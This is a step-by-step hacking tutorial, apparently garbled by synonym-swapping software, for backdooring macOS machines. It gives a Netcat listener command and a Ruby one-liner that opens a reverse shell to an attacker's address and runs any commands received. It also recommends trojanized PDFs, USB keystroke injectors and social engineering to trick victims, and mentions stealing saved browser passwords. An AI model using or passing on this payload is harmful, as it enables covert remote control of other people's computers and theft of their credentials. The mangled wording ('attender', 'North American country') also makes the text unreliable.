Step 1:Start a Netcat attender
To start mistreatment Ruby as a backdooring mechanism, open a terminal in Kali (or any Unix-based software package with Netcat installed), and use the below Netcat command to start out a attender. this is often wherever the target macOS device can connect with once the Ruby command is dead.
nc -v -l -p 9999
- Netcat can open a listening (-l) port on each obtainable interface.
- If you are operating in a very native network, the Netcat beholder are obtainable on your native address (e.g., 192.168.0.X). If the beholder is started on a virtual non-public server (VPS), take care to use the scientific discipline address of your VPS in future Ruby commands.
- The port (-p) variety (9999) is unfair and may be modified.
- The style (-v) argument is vital here. while not this, once a affiliation to the target MacBook, Mac Pro, or the other laptop running macOS is established, the Netcat terminal won’t modification. to produce some type of indication the payload was dead with success, modify style.
Step 2:Use Ruby to Create a Backdoor
Execute this in the macOS device to create a backdoor to the Netcat listener:
ruby -rsocket -e “c=TCPSocket.new(‘1.2.3.4′,’9999′);while(cmd=c.gets);IO.popen(cmd,’r’){|io|c.print io.read}end”
This jest higher than can produce a transmission control protocol socket (TCPSocket.new) and a minute loop (while … end) that says “while there is information coming back in, assign it to cmd, run the input as a shell command, and print it back in our terminal (IO.popen(cmd,’r’)c.print io.read).” basically, we have a tendency to’re telling Ruby to require the command we submit, execute it, interpret the output, and send it back to North American country … over and once again till we have a tendency to break the affiliation to the macOS device.
Remember to alter the information science address (1.2.3.4) and port range (9999) to match the Netcat attender created within the previous step. this will be an area network information science address or information science address of your VPS. On the attacker’s system (as shown below), the Netcat terminal can show a replacement affiliation was established.
nc -v -l -p 9999 listening on [any] 9999 … connect to [192.168.1.55] from (UNKNOWN) [192.168.1.31] 50328
Situational-awareness and post-exploitation attacks will begin. If this Ruby command is embedded into a trojanized PDF and go past the target, you may not have root access. in this case, there square measure many ways that of gaining privilege access. If Ruby was accustomed physically backdoor a macOS device, you’ll need root and may begin selling passwords hold on within the target’s net browsers. Either way, this Ruby command can utterly bypass antivirus package like Avast and AVG.
Step 3:Use a Social Engineering Attack
Such payloads are often dead employing a USB Rubby lover or simply embedded into AppleScripts and sent to the victim. There square measure many ways to urge the payload to the target, however you’ll have to utilize your social engineering skills to urge them to open it.